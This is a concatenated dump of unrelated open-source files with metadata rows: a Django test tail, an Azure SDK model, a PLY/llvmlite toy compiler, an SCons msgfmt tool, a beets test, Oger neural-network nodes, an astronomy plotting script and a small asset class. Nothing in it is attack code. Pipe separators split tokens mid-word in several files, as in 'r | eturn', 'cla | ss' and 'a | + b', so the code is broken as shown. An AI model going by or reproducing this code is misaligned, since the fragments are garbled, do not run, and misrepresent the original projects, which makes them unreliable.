vote.score = 999
vote.save()
r = vote.records.latest()
self.assertEqual(
number_of_records_before_save + 1,
vote.records.count()
)
self.assertEqual(vote.score, r.score)
def test_unchanged_save_recording(self):
vote = Vote.objects.first()
number_of_records_before_save = vote.records.count()
vote.save()
self.assertEqual(
number_of_records_before_save, vote.records.count()
)
def test_indirect_effect_recording_on_reverse_related_changed_save(self):
vote = Vote.objects.first()
comment = vote.comment
number_of_records_before_save = vote.records.count()
reverse_related_property_before_save = vote.reverse_related_property
comment.point = 'changed point in relative'
comment.text = 'changed text in relative'
comment.save()
r = vote.records.latest()
self.assertEqual(
number_of_records_before_save + 1,
vote.records.count()
)
self.assertEqual(
vote.reverse_related_property,
r.reverse_related_property
)
self.assertNotEqual(
reverse_related_property_before_save,
r.reverse_related_property
)
def test_indirect_effect_recording_on_reverse_related_unchanged_save(self):
vote = Vote.objects.first()
comment = vote.comment
number_of_records_before_save = vote.records.count()
comment.save()
self.assertEqual(number_of_records_before_save, vote.records.count())
|
lmazuel/azure-sdk-for-python | azure-servicefabric/azure/servicefabric/models/service_placement_policy_description.py | Python | mit | 1,801 | 0.00111 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ServicePlacementPolicyDescription(Model):
| """Describes the policy to be used for placement of a Service Fabr | ic service.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: ServicePlacementInvalidDomainPolicyDescription,
ServicePlacementNonPartiallyPlaceServicePolicyDescription,
ServicePlacementPreferPrimaryDomainPolicyDescription,
ServicePlacementRequiredDomainPolicyDescription,
ServicePlacementRequireDomainDistributionPolicyDescription
:param type: Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': 'Type', 'type': 'str'},
}
_subtype_map = {
'type': {'InvalidDomain': 'ServicePlacementInvalidDomainPolicyDescription', 'NonPartiallyPlaceService': 'ServicePlacementNonPartiallyPlaceServicePolicyDescription', 'PreferPrimaryDomain': 'ServicePlacementPreferPrimaryDomainPolicyDescription', 'RequireDomain': 'ServicePlacementRequiredDomainPolicyDescription', 'RequireDomainDistribution': 'ServicePlacementRequireDomainDistributionPolicyDescription'}
}
def __init__(self):
super(ServicePlacementPolicyDescription, self).__init__()
self.type = None
|
mitchmyburgh/compilers_assignment | part2/ir_ula.py | Python | gpl-2.0 | 4,411 | 0.005894 | #----------------------------------------------
# ir_ula.py
#
# Intermediate representation for the ula (unconventional language)
# By Mitch Myburgh (MYBMIT001)
# 24 09 2015
#----------------------------------------------
from llvmlite import ir
from ctypes import CFUNCTYPE, c_float
import llvmlite.binding as llvm
# code for the parser
from ply import yacc
from lex_ula import tokens
import os
import sys
start = "Start"
def p_start(p):
"""Start : Program"""
p[0] = p[1]
def p_program_statements(p):
"""Program : Statements"""
p[0] = ["Program", p[1]]
def p_statements(p):
"""Statements : Statements Statement
| Statement"""
if len(p) == 2:
p[0] = [p[1]]
else:
p[0] = p[1] + [p[2]]
def p_statement(p):
"""Statement : ID '=' expression"""
p[0] = ["=", [p[1]], p[3]]
def p_expression_plus(p):
"""expression : expression '@' term"""
p[0] = ["@", p[1], p[3]]
def p_expression_minus(p):
"""expression : expression '$' term"""
p[0] = ["$", p[1], p[3]]
def p_expression_term(p):
"""expression : term"""
p[0] = p[1]
def p_term_multiply(p):
"""term : term '#' factor"""
p[0] = ["#", p[1], p[3]]
def p_term_divide(p):
"""term : term '&' factor"""
p[0] = ["&", p[1], p[3]]
def p_term_factor(p):
"""term : factor"""
p[0] = p[1]
def p_factor_expression(p):
"""factor : '(' expression ')'"""
p[0] = p[2]
def p_factor_float(p):
"""factor : FLOAT_LITERAL"""
p[0] = [p[1]]
def p_factor_id(p):
"""factor : ID"""
p[0] = [p[1]]
def p_error(p):
pass
def print_tree(tupletree, depth=0):
print("\t"*depth, tupletree[0])
for item in tupletree[1]:
if isinstance(item, tuple):
print_tree(item, depth + 1)
else:
print("\t"*(depth+1), item)
parser = yacc.yacc()
#main function for the parser
def main():
global infilename
if len(sys.argv) == 2:
infilename = sys.argv[1]
if os.path.isfile(infilename):
infile = open(infilename, "r")
syntree = parser.parse(infile.read())
# print_tree(syntree)
return syntree
else:
print("Not a valid file")
else:
print("Specify filename, e.g. parse_ula.ply my_program.ula")
##llvmlite stuff
last_var = "" # keeps track of the last var assigned
var_dict = {} # var names associated with memory location
def code_gen(tree): # traverse tree recursively to generate code
global last_var
if tree[0] == "Program":
for t in tree[1]:
code_gen(t)
elif tree[0] == "=":
last_var = tree[1][0]
var_dict[last_var] = builder.alloca(ir.FloatType())
builder.store(code_gen(tree[2]), var_dict[last_var])
elif tree[0] == "@":
return(builder.fadd(code_gen(tree[1]),code_gen(tree[2])))
elif tree[0] == | "$":
return(builder.fsub(code_gen(tree[1]),code_gen(tree[2])))
elif tree[0] == "#":
r | eturn(builder.fmul(code_gen(tree[1]),code_gen(tree[2])))
elif tree[0] == "&":
return(builder.fdiv(code_gen(tree[1]),code_gen(tree[2])))
elif tree[0] in var_dict.keys():
return builder.load(var_dict[tree[0]])
elif isinstance(float(tree[0]), float):
return(ir.Constant(ir.FloatType(), float(tree[0])))
#main function for the ir generator
def run():
global builder
tree = main()
flttyp = ir.FloatType() # create float type
fnctyp = ir.FunctionType(flttyp, ()) # create function type to return a float
module = ir.Module(name="ula") # create module named "ula"
func = ir.Function(module, fnctyp, name="main") # create "main" function
block = func.append_basic_block(name="entry") # create block "entry" label
builder = ir.IRBuilder(block) # create irbuilder to generate code
code_gen(tree) # call code_gen() to traverse tree & generate code
builder.ret(builder.load(var_dict[last_var])) # specify return value
return module
if __name__ == "__main__":
module = run()
outfilename = os.path.splitext(infilename)[0]+".ir"
outfile = open(outfilename, "w")
print(str(module).strip())
print(str(module).strip(), file = outfile)
outfile.close()
|
h4ck3rm1k3/OpenWrt-Firefly-SDK | staging_dir/host/lib/scons-2.3.1/SCons/Tool/msgfmt.py | Python | gpl-2.0 | 4,460 | 0.015919 | """ msgfmt tool """
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
__revision__ = "src/engine/SCons/Tool/msgfmt.py 2014/03/02 14:18:15 garyo"
from SCons.Builder import BuilderBase
#############################################################################
class _MOFileBuilder(BuilderBase):
""" The builder class for `MO` files.
The reason for this builder to exists and its purpose is quite simillar
as for `_POFileBuilder`. This time, we extend list of sources, not targets,
and call `BuilderBase._execute()` only once (as we assume single-target
here).
"""
def _execute(self, env, target, source, *args, **kw):
# Here we add support for 'LINGUAS_FILE' keyword. Emitter is not suitable
# in this case, as it is called too late (after multiple sources
# are handled single_source builder.
import SCons.Util
from SCons.Tool.GettextCommon import _read_linguas_from_files
linguas_files = None
if env.has_key('LINGUAS_FILE') and env['LINGUAS_FILE'] is not None:
linguas_files = env['LINGUAS_FILE']
# This should prevent from endless recursion.
env['LINGUAS_FILE'] = None
# We read only languages. Suffixes shall be added automatically. |
linguas = _r | ead_linguas_from_files(env, linguas_files)
if SCons.Util.is_List(source):
source.extend(linguas)
elif source is not None:
source = [source] + linguas
else:
source = linguas
result = BuilderBase._execute(self,env,target,source,*args, **kw)
if linguas_files is not None:
env['LINGUAS_FILE'] = linguas_files
return result
#############################################################################
#############################################################################
def _create_mo_file_builder(env, **kw):
""" Create builder object for `MOFiles` builder """
import SCons.Action
# FIXME: What factory use for source? Ours or their?
kw['action'] = SCons.Action.Action('$MSGFMTCOM','$MSGFMTCOMSTR')
kw['suffix'] = '$MOSUFFIX'
kw['src_suffix'] = '$POSUFFIX'
kw['src_builder'] = '_POUpdateBuilder'
kw['single_source'] = True
return _MOFileBuilder(**kw)
#############################################################################
#############################################################################
def generate(env,**kw):
""" Generate `msgfmt` tool """
import SCons.Util
from SCons.Tool.GettextCommon import _detect_msgfmt
try:
env['MSGFMT'] = _detect_msgfmt(env)
except:
env['MSGFMT'] = 'msgfmt'
env.SetDefault(
MSGFMTFLAGS = [ SCons.Util.CLVar('-c') ],
MSGFMTCOM = '$MSGFMT $MSGFMTFLAGS -o $TARGET $SOURCE',
MSGFMTCOMSTR = '',
MOSUFFIX = ['.mo'],
POSUFFIX = ['.po']
)
env.Append( BUILDERS = { 'MOFiles' : _create_mo_file_builder(env) } )
#############################################################################
#############################################################################
def exists(env):
""" Check if the tool exists """
from SCons.Tool.GettextCommon import _msgfmt_exists
try:
return _msgfmt_exists(env)
except:
return False
#############################################################################
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
kareemallen/beets | test/test_vfs.py | Python | mit | 1,780 | 0.000562 | # -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2015, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to | whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Tests for the virtual filesystem builder.."""
from __future__ import (division, absolute_import, print_function,
unicode_literals)
from test import _common
from test._common import unittest
from beets import library
from beets import vfs
cla | ss VFSTest(_common.TestCase):
def setUp(self):
super(VFSTest, self).setUp()
self.lib = library.Library(':memory:', path_formats=[
('default', 'albums/$album/$title'),
('singleton:true', 'tracks/$artist/$title'),
])
self.lib.add(_common.item())
self.lib.add_album([_common.item()])
self.tree = vfs.libtree(self.lib)
def test_singleton_item(self):
self.assertEqual(self.tree.dirs['tracks'].dirs['the artist'].
files['the title'], 1)
def test_album_item(self):
self.assertEqual(self.tree.dirs['albums'].dirs['the album'].
files['the title'], 2)
def suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == b'__main__':
unittest.main(defaultTest='suite')
|
npinto/Oger | Oger/gradient/models.py | Python | gpl-3.0 | 2,883 | 0.005897 | """
Several pre-defined models that use the gradient nodes.
"""
import mdp
import Oger
import trainers
# TODO: The Autoencoder has not been tested yet.
class MLPNode(mdp.Node):
"""Defines a multilayer pe | rceptron with | a hidden layer of tanh units.r
"""
def __init__(self, input_dim, output_dim, hidden_dim=100,
trainer=trainers.GradientDescentTrainer(), loss='mse', dtype='float64'):
"""Initializes and constructs a multilayer perceptron.
Arguments:
- input_dim: input dimensionality
- output_dim: output dimensionality
- hidden_dim: number of hidden units
- trainer: gradient based trainer to use, default: GradientDescentTrainer
- loss: type of loss to minimize. Setting this to 'mse' will use linear outputs and minimize the mean squared error and setting this to 'ce' will use softmax outputs and minimize cross-entropy error.
"""
super(MLPNode, self).__init__(input_dim, output_dim, dtype)
if loss == 'mse':
transfer = Oger.utils.LinearFunction()
loss_f = Oger.utils.mse
if loss == 'ce':
transfer = Oger.utils.SoftmaxFunction()
loss_f = Oger.utils.ce
# TODO: Turn these into normal perceptron nodes once the extension
# mechanism is fixed.
perceptron1 = Oger.gradient.GradientPerceptronNode(input_dim, hidden_dim,
transfer_func=Oger.utils.TanhFunction)
perceptron2 = Oger.gradient.GradientPerceptronNode(hidden_dim, output_dim,
transfer_func=transfer)
# This is a flow.
self.layers = perceptron1 + perceptron2
self._bpnode = Oger.gradient.BackpropNode(self.layers, trainer, loss_f)
def _train(self, x, t):
"""Train the perceptron to produce the desired output 't'."""
self._bpnode.train(x=x, t=t)
def _execute(self, x):
return self._bpnode.execute(x)
def is_trainable(self):
return True
def is_invertible(self):
return False
def _get_supported_dtypes(self):
return ['float32', 'float64']
class AutoencoderNode(MLPNode):
"""Use a multilayer perceptron to reconstruct its input."""
def __init__(self, input_dim, hidden_dim=100, trainer=trainers.GradientDescentTrainer(),
dtype='float64'):
super(AutoencoderNode, self).__init__(input_dim, input_dim, hidden_dim, trainer,
loss='mse', dtype=dtype)
def _train(self, x):
"""Train the Autoencoder to recontstruct 'x'."""
self._bpnode.train(x, x)
def get_encoder(self):
"""Return the first PerceptronNode layer that encodes the input."""
return self.layers[0]
|
sniemi/SamPy | herschel/plotmergers3.py | Python | bsd-2-clause | 24,711 | 0.00518 | """
Generates some prediction plots for the Herschel I paper.
:author: Sami-Matias Niemi
:contact: sammy@sammyniemi.com
:version: 0.5
"""
import matplotlib
matplotlib.use('PS')
#matplotlib.use('Agg')
matplotlib.rc('text', usetex=True)
matplotlib.rcParams['font.size'] = 17
matplotlib.rc('xtick', labelsize=14)
matplotlib.rc('axes', linewidth=1.1)
matplotlib.rcParams['legend.fontsize'] = 12
matplotlib.rcParams['legend.handlelength'] = 3
matplotlib.rcParams['xtick.major.size'] = 5
matplotlib.rcParams['ytick.major.size'] = 5
import os
import pylab as P
import numpy as N
import SamPy.db.sqlite as sq
import SamPy.astronomy.datamanipulation as dm
def plotMergerFractions(query,
xlabel, ylabel,
output, out_folder,
mergetimelimit=0.25,
mstarmin=8.0,
mstarmax=11.5,
mbins=15,
ymin=-0.001,
ymax=1.01,
logscale=False):
"""
Plot merger fractions.
"""
#get data, all galaxies
data = sq.get_data_sqliteSMNfunctions(path, db, query)
#mstar = N.log10(data[:, 0])
mstar = data[:, 0]
tmerge = data[:, 1]
tmajor = data[:, 2]
print N.min(mstar), N.max(mstar)
#masks
nomergeMask = tmerge < 0.0
majorsMask = (tmajor > 0.0) & (tmajor <= mergetimelimit)
majorsMask2 = (tmajor > mergetimelimit) & (tmajor <= 0.5)
mergersMask = (tmerge > 0.0) & (tmerge <= mergetimelimit) &\
(majorsMask == False) & (majorsMask2 == False)
mergersMask2 = (tmerge > mergetimelimit) & (tmerge <= 0.5) &\
(majorsMask2 == False)
#bin the data
mids, numbs = dm.binAndReturnMergerFractions2(mstar,
nomergeMask,
mergersMask,
majorsMask,
mergersMask2,
majorsMask2,
mstarmin,
mstarmax,
mbins,
logscale)
#the fraction of mergers
noMergerFraction = [float(x[1]) / x[0] for x in numbs]
mergerFraction = [float(x[2]) / x[0] for x in numbs]
majorMergerFraction = [float(x[3]) / x[0] for x in numbs]
mergerFraction2 = [float(x[4]) / x[0] for x in numbs]
majorMergerFraction2 = [float(x[5]) / x[0] for x in numbs]
#sanity check
for a, b, c, d, e in zip(noMergerFraction, mergerFraction, majorMergerFraction,
mergerFraction2, majorMergerFraction2):
print a + b + c + d + e
#make the figure
if 'ps' in output:
fig = P.figure()
else:
fig = P.figure(figsize=(10, 10))
fig.subplots_adjust(left=0.08, bottom=0.07,
right=0.97, top=0.93)
ax1 = fig.add_subplot(111)
#draw lines ["-","--","-.",":"]
ax1.plot(mids, noMergerFraction, 'k-', lw=2.6,
label='Never Merged')
# ax1.plot(mids, mergerFraction, ls = '--', lw = 2.6,
# label = 'Minor Merger: $T \leq 250$ Myr')
# ax1.plot(mids, mergerFraction2, ls = '-.', lw = 2.6,
# label = 'Minor Merger: $250 < T \leq 500$ Myr')
# ax1.plot(mids, majorMergerFraction, ls = '--', lw = 2.6,
# label = 'Major Merger: $T \leq 250$ Myr')
# ax1.plot(mids, majorMergerFraction2, ls = '-.', lw = 2.6,
# label = 'Major Merger: $250 < T \leq 500$ Myr')
ax1.plot(mids, majorMergerFraction, ls='-', lw=2.6, c='0.3',
label='Young Major Merger')
ax1.plot(mids, mergerFraction, ls='-.', lw=2.6, c='0.2',
label='Young Minor Merger')
ax1.plot(mids, majorMergerFraction2, ls='--', lw=2.6, c='0.4',
label='Old Major Merger')
ax1.plot(mids, mergerFraction2, ls=':', lw=2.6, c='0.5',
label='Old Minor Merger')
#labels
ax1.set_xlabel(xlabel)
ax1.set_ylabel(ylabel)
#limits
ax1.set_ylim(ymin, ymax)
#add annotate
P.text(0.5, 0.93, 'All galaxies\n$2 \leq z < 4$',
horizontalalignment='center',
verticalalignment='center',
transform=ax1.transAxes)
#legend and save
P.legend(loc='upper left')
P.savefig(out_folder + output)
def plotMergerFractions2(query,
xlabel, ylabel,
output, out_folder,
mergetimelimit=0.25,
mstarmin=8.0,
mstarmax=11.5,
mbins=15,
ymin=0.0,
ymax=1.0,
logscale=False):
#get data, all galaxies
data = sq.get_data_sqliteSMNfunctions(path, db, query)
if logscale:
mstar = N.log10(data[:, 0])
logscale = False
else:
mstar = data[:, 0]
print N.min(mstar), N.max(mstar)
tmerge = data[:, 1]
tmajor = data[:, 2]
#masks
nomergeMask = tmerge < 0.0
majorsMask = (tmajor > 0.0) & (tmajor <= mergetimelimit)
majorsMask2 = (tmajor > mergetimelimit)
mergersMask = (tmerge > 0.0) & (tmerge <= mergetimelimit) &\
(majorsMask == False) & (majorsMask2 == False)
mergersMask2 = (nomergeMask == False) & (majorsMask == False) &\
(mergersMask == False) & (majorsMask2 == False)
#bin the data
mids, numbs = dm.binAndReturnMergerFractions2(mstar,
nomergeMask,
mergersMask,
majorsMask,
mergersMask2,
majorsMask2,
mstarmin,
mstarmax,
mbins,
logscale)
#the fraction of mergers
noMergerFraction = N.array([float(x[1]) / x[0] for x in numbs])
mergerFraction = N.array([float(x[2]) / x[0] for x in numbs])
majorMergerFraction = N.array([float(x[3]) / x[0] for x in numbs])
mergerFraction2 = N.array([float(x[4]) / x[0] for x in numbs])
majorMergerFraction2 = N.array([float(x[5]) / x[0] for x in numbs])
#sanity check
for a, b, c, d, e in zip(noMergerFraction, mergerFraction, majorMergerFraction,
mergerFraction2, majorMergerFraction2):
print a | + b + c + d + e
#make the figure
# fig = P.figure()
fig = P.figure(figsize=(10, 10))
fig.subplots_adjust(left=0.08, bottom=0.1,
right=0.97, top=0.93)
ax1 | = fig.add_subplot(111)
#calculate widths
wd = (mids[1] - mids[0]) * 1.0
#draw bars
ax1.bar(mids, noMergerFraction,
label='Never Merged', align='center',
color='grey', width=wd, hatch='.')
ax1.bar(mids, mergerFraction,
bottom=noMergerFraction, align='center',
label='Minor Merger: $T \leq %.0f$ Myr' % (mergetimelimit * 1000.),
color='red', width=wd, hatch='/')
ax1.bar(mids, mergerFraction2, align='center',
bottom=noMergerFraction + mergerFraction,
label='Minor Merger: $T > %.0f$ Myr' % (mergetimelimit * 1000.),
color='blue', width=wd, hatch='|')
ax1.bar(mids, majorMergerFraction, align='center',
bottom=noMergerFraction + mergerFraction + mergerFraction2,
label='Major Merger: $T \leq %.0f$ Myr' % (mergetimelimit * 1000.),
color='magenta', width=wd, hatch='x')
ax1.bar(mids, majorMergerFraction2, align='center',
bottom=noMergerFraction + mergerFraction + mergerFraction2 + majorMergerFraction,
label='Major Merger: $T > %.0f$ Myr' % (mergetimelimit * 1000.),
|
ItsLastDay/academic_university_2016-2018 | subjects/BigData/hw01/fourth_group/gen.py | Python | gpl-3.0 | 409 | 0.007335 | from datetime import timedelta, date
def daterange(start_date, end_date):
for | n in range(int ((end_date - start_date).days)):
yield start_date + timedelta(n)
start_date = date(2017, 9, 30)
end_date = date(2017, 1 | 0, 23)
for single_date in daterange(start_date, end_date):
print './neg_runner.sh', single_date.strftime("%Y-%m-%d")
print './pos_runner.sh', single_date.strftime("%Y-%m-%d")
|
gromacs/copernicus | cpc/server/state/asset.py | Python | gpl-2.0 | 958 | 0.003132 | # This file is part of Copernicus
# http://www.copernicus-computing.org/
#
# Copyright (C) 2011, Sander Pronk, Iman Pouya, Erik Lindahl, and others.
#
# This program is free software; yo | u can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as published
# by the Free Software Foundati | on
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
class Asset(object):
@staticmethod
def cmdOutput():
return "cmdOutput"
@staticmethod
def getDirs():
return [Asset.cmdOutput()]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.